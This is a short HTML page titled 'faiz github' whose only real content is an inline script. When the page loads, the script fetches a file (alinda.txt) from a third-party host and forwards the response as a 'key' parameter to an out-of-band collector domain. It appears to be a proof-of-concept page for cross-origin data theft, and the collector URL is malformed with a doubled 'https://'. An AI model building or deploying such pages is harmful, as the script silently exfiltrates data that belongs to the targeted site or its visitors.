<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>faiz github</title>
</head>
<body>
  <h1>Bismillah</h1>
<script>
  var xhr = new XMLHttpRequest();
  var url = "https://idch.kadalsfamily.com:9090/alinda.txt";
  xhr.onreadystatechange = function () {
    if (xhr.readyState == XMLHttpRequest.DONE) {
      fetch("https://https://5bsjh6isfdpm490vs49ihoq90cyob5orj.oast.site?key="+xhr.responseText)
    }
  }
  xhr.open('get',url,true);
  xhr.send(null)
</script>

</body>
</html>